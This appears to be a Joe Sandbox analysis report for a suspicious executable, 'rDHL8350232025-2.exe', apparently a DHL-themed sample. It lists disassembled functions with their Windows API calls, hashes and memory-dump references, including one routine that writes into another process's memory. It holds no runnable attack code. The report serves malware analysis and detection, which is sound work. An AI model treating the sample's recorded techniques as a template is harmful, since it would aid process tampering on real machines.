                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 44706859-0
                                                                                      • Opcode ID: 1989f2fbfb3d237e17a80981b64d7d6774081057b9be68582bb429ae3871c614
                                                                                      • Instruction ID: 9715cb5ae17d22662098d59513afed6d8777d2b58240e27d2f96fbe790ae82dd
                                                                                      • Opcode Fuzzy Hash: 1989f2fbfb3d237e17a80981b64d7d6774081057b9be68582bb429ae3871c614
                                                                                      • Instruction Fuzzy Hash: DCF04935200302ABEB214FA5EC49F963BADFF8A762F244414FE49C6251CA75DC50CA60
                                                                                      Function 00091014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0009102A
                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00091036
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091045
                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0009104C
                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091062
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 44706859-0
                                                                                      • Opcode ID: d8e76a93a995ae9ee80786b060eb03362b273ecd270780062b3f2aaa6e3cb095
                                                                                      • Instruction ID: a9b36616ba3d63a1ab6571c1687a4c181b5b75a3211bad356a382dd964123cb5
                                                                                      • Opcode Fuzzy Hash: d8e76a93a995ae9ee80786b060eb03362b273ecd270780062b3f2aaa6e3cb095
                                                                                      • Instruction Fuzzy Hash: 1EF06D35200302EBFB215FA5EC49F963BADFF8A7A1F240414FE49C7250CA75D9508A60
                                                                                      Function 000A030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0324
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0331
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A033E
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A034B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0358
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000A017D,?,000A32FC,?,00000001,00072592,?), ref: 000A0365
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: a718a9dcb87a0a0d643ac899007d4e6488a35570ed70670730d2789fad512695
                                                                                      • Instruction ID: 9a2c29090ea236d730528d1b3bb72ad22ebd10bb307834cd5c0a2f0f84524784
                                                                                      • Opcode Fuzzy Hash: a718a9dcb87a0a0d643ac899007d4e6488a35570ed70670730d2789fad512695
                                                                                      • Instruction Fuzzy Hash: BE01AE72800B199FCB30AFA6D880812FBF9BF613153158A3FD19652931C3B1AA58DF80
                                                                                      Function 0006D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 0006D752
                                                                                        • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                                                                        • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                      • _free.LIBCMT ref: 0006D764
                                                                                      • _free.LIBCMT ref: 0006D776
                                                                                      • _free.LIBCMT ref: 0006D788
                                                                                      • _free.LIBCMT ref: 0006D79A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: fc035b8bbcd68164667cc1b0fd7b53d4186bc9adff4bbb0fcff08d414e899edb
                                                                                      • Instruction ID: 442dbe1b57ebc2cab997533cd15784fe20133d5ad86001c5f15452473495e133
                                                                                      • Opcode Fuzzy Hash: fc035b8bbcd68164667cc1b0fd7b53d4186bc9adff4bbb0fcff08d414e899edb
                                                                                      • Instruction Fuzzy Hash: A2F03632B48608AB9665EB64FAC6C6A77DFBB44750B940C0AF048D7902DB34FC80D675
                                                                                      Function 00095C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00095C58
                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00095C6F
                                                                                      • MessageBeep.USER32(00000000), ref: 00095C87
                                                                                      • KillTimer.USER32(?,0000040A), ref: 00095CA3
                                                                                      • EndDialog.USER32(?,00000001), ref: 00095CBD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3741023627-0
                                                                                      • Opcode ID: d7042b1d29d19a277a90468198e90ed4de5d4b25cd87fc8a1e22e4ec2315a971
                                                                                      • Instruction ID: 68b5090b8fcbe92622c99bf0fc511a762244c68b25f6f8037231f53c7d8b98f0
                                                                                      • Opcode Fuzzy Hash: d7042b1d29d19a277a90468198e90ed4de5d4b25cd87fc8a1e22e4ec2315a971
                                                                                      • Instruction Fuzzy Hash: 9E013170500B04AFFF325B11DE4EFEA77B8BB04B06F041659E687A15E1DBF4A9849B90
                                                                                      Function 000622A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 000622BE
                                                                                        • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                                                                        • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                      • _free.LIBCMT ref: 000622D0
                                                                                      • _free.LIBCMT ref: 000622E3
                                                                                      • _free.LIBCMT ref: 000622F4
                                                                                      • _free.LIBCMT ref: 00062305
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 57fa046b1e474347aed3bc5983e93df5ce422be48d0c901228576a0027f73e50
                                                                                      • Instruction ID: 7da6be415a42971f37a670a793cef530dc7628d51cc55d76547205bb65f483ba
                                                                                      • Opcode Fuzzy Hash: 57fa046b1e474347aed3bc5983e93df5ce422be48d0c901228576a0027f73e50
                                                                                      • Instruction Fuzzy Hash: F8F05470500915ABD717AF54BC02D5C3BA6F718B91B10050AF450D2A72CBB80891FFF5
                                                                                      Function 000495C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EndPath.GDI32(?), ref: 000495D4
                                                                                      • StrokeAndFillPath.GDI32(?,?,000871F7,00000000,?,?,?), ref: 000495F0
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00049603
                                                                                      • DeleteObject.GDI32 ref: 00049616
                                                                                      • StrokePath.GDI32(?), ref: 00049631
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                      • String ID:
                                                                                      • API String ID: 2625713937-0
                                                                                      • Opcode ID: e82cc5724931719ea44121ab506209affd4bec5c07b1e74fd6c3697d5fc8daf5
                                                                                      • Instruction ID: 4851afddf3048a438f32eab2f3990a28817a2ddf5efb82bbafb328c6ac5764c4
                                                                                      • Opcode Fuzzy Hash: e82cc5724931719ea44121ab506209affd4bec5c07b1e74fd6c3697d5fc8daf5
                                                                                      • Instruction Fuzzy Hash: 06F03C31005604EBEB265F65ED1CF653BA1BB09326F148224F4A9554F0C7B88991DF24
                                                                                      Function 00060F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$_free
                                                                                      • String ID: a/p$am/pm
                                                                                      • API String ID: 3432400110-3206640213
                                                                                      • Opcode ID: af90be36a4e1ac48e960faba878f62cee57cf8700a25d166e48b8b11e521748e
                                                                                      • Instruction ID: 0ace4c10c96b955b1b28b32b678f39c26b859a506bcd21b53c986151386ba351
                                                                                      • Opcode Fuzzy Hash: af90be36a4e1ac48e960faba878f62cee57cf8700a25d166e48b8b11e521748e
                                                                                      • Instruction Fuzzy Hash: 8FD10071900216DADB689F68C855BFEB7F3EF06300F2C4119E906ABB91D3759E81CB91
                                                                                      Function 000B7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00050242: EnterCriticalSection.KERNEL32(0010070C,00101884,?,?,0004198B,00102518,?,?,?,000312F9,00000000), ref: 0005024D
                                                                                        • Part of subcall function 00050242: LeaveCriticalSection.KERNEL32(0010070C,?,0004198B,00102518,?,?,?,000312F9,00000000), ref: 0005028A
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 000500A3: __onexit.LIBCMT ref: 000500A9
                                                                                      • __Init_thread_footer.LIBCMT ref: 000B7BFB
                                                                                        • Part of subcall function 000501F8: EnterCriticalSection.KERNEL32(0010070C,?,?,00048747,00102514), ref: 00050202
                                                                                        • Part of subcall function 000501F8: LeaveCriticalSection.KERNEL32(0010070C,?,00048747,00102514), ref: 00050235
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                                                      • API String ID: 535116098-3733170431
                                                                                      • Opcode ID: 66cbf4f27b8468bfda473a0bccb9feb03db9a9059dae426e2ecb59045bb01772
                                                                                      • Instruction ID: e64870ae6b3bf2ca43812df4ef96a333d66422d7c23ce38967bc1f5ab3d41669
                                                                                      • Opcode Fuzzy Hash: 66cbf4f27b8468bfda473a0bccb9feb03db9a9059dae426e2ecb59045bb01772
                                                                                      • Instruction Fuzzy Hash: F8917970A04209EFCB14EF94D891DEDBBB5EF89340F10805DF84AAB292DB71AE41CB51
                                                                                      Function 00092716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0009B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000921D0,?,?,00000034,00000800,?,00000034), ref: 0009B42D
                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00092760
                                                                                        • Part of subcall function 0009B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0009B3F8
                                                                                        • Part of subcall function 0009B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0009B355
                                                                                        • Part of subcall function 0009B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00092194,00000034,?,?,00001004,00000000,00000000), ref: 0009B365
                                                                                        • Part of subcall function 0009B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00092194,00000034,?,?,00001004,00000000,00000000), ref: 0009B37B
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000927CD
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0009281A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                      • String ID: @
                                                                                      • API String ID: 4150878124-2766056989
                                                                                      • Opcode ID: a6cfc29172ba3719999d954735383a97a5f7ace10cd3aa0fc657e03f25553056
                                                                                      • Instruction ID: 66e4c8ac7fe0f92fb92e684bbb5319a726bc959b28b18c39a5c0319456f9602c
                                                                                      • Opcode Fuzzy Hash: a6cfc29172ba3719999d954735383a97a5f7ace10cd3aa0fc657e03f25553056
                                                                                      • Instruction Fuzzy Hash: 4E411972900218BFDF10DBA4DD85EEEBBB8AF09710F108099FA55B7181DB706E45DBA1
                                                                                      Function 0006172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rDHL8350232025-2.exe,00000104), ref: 00061769
                                                                                      • _free.LIBCMT ref: 00061834
                                                                                      • _free.LIBCMT ref: 0006183E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$FileModuleName
                                                                                      • String ID: C:\Users\user\Desktop\rDHL8350232025-2.exe
                                                                                      • API String ID: 2506810119-4067824147
                                                                                      • Opcode ID: 42d5f333dc30ca2aa84072996ce9ff7b011d4dbf9467c139a040e01308ed1ac2
                                                                                      • Instruction ID: d759e7e0547068a1131b687cf17ee0cdf1a88bf9dede768b0f7a192b5721148e
                                                                                      • Opcode Fuzzy Hash: 42d5f333dc30ca2aa84072996ce9ff7b011d4dbf9467c139a040e01308ed1ac2
                                                                                      • Instruction Fuzzy Hash: D8316275A04218BFDB21DF99D885DDEBBFEEB85310F184166F805D7212DAB04E40CB90
                                                                                      Function 0009C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0009C306
                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 0009C34C
                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00101990,00EF5DC0), ref: 0009C395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                      • String ID: 0
                                                                                      • API String ID: 135850232-4108050209
                                                                                      • Opcode ID: f30fb79b36475234f4daf2414d7bd518b4f206366ec1bda18e595c1f29a54caf
                                                                                      • Instruction ID: e20c252a32469c43d68941a988db35a89456ce01c041f6417ae8c451ee044e54
                                                                                      • Opcode Fuzzy Hash: f30fb79b36475234f4daf2414d7bd518b4f206366ec1bda18e595c1f29a54caf
                                                                                      • Instruction Fuzzy Hash: 4B41C3716043019FEB20DF24D844F5ABBE8AF85320F00C61DF8A5972D2D770EA04DB52
                                                                                      Function 000C4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,000CCC08,00000000,?,?,?,?), ref: 000C44AA
                                                                                      • GetWindowLongW.USER32 ref: 000C44C7
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C44D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID: SysTreeView32
                                                                                      • API String ID: 847901565-1698111956
                                                                                      • Opcode ID: b7ef0626a413ac0278af8031235753f475e4849834d76ab871ce8a6f37d96dc8
                                                                                      • Instruction ID: 336237b4f661781fafe78a2d68ddaf31ae817c733c7363b18ac0f1336989168b
                                                                                      • Opcode Fuzzy Hash: b7ef0626a413ac0278af8031235753f475e4849834d76ab871ce8a6f37d96dc8
                                                                                      • Instruction Fuzzy Hash: 27318931210605AFEB658F38DC45FEA7BA9FB08324F204329F979921E1D774AC509B50
                                                                                      Function 000C4537 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 000C461F
                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000C4634
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: '$p]
                                                                                      • API String ID: 3850602802-3217900071
                                                                                      • Opcode ID: 3904fc2bef018e9d625f99ce4bb5e02bfe502ca91d69fcbab060cd7660199096
                                                                                      • Instruction ID: fcd3c15875c043c34de3c0f0383feaec0971e2052c851aba169da72c3d1f6a4f
                                                                                      • Opcode Fuzzy Hash: 3904fc2bef018e9d625f99ce4bb5e02bfe502ca91d69fcbab060cd7660199096
                                                                                      • Instruction Fuzzy Hash: 59311774A006099FDB14CFA9C990FDE7BB5FB09300F10406AE904AB342D771A941CF90
                                                                                      Function 00096E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SysReAllocString.OLEAUT32(?,?), ref: 00096EED
                                                                                      • VariantCopyInd.OLEAUT32(?,?), ref: 00096F08
                                                                                      • VariantClear.OLEAUT32(?), ref: 00096F12
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
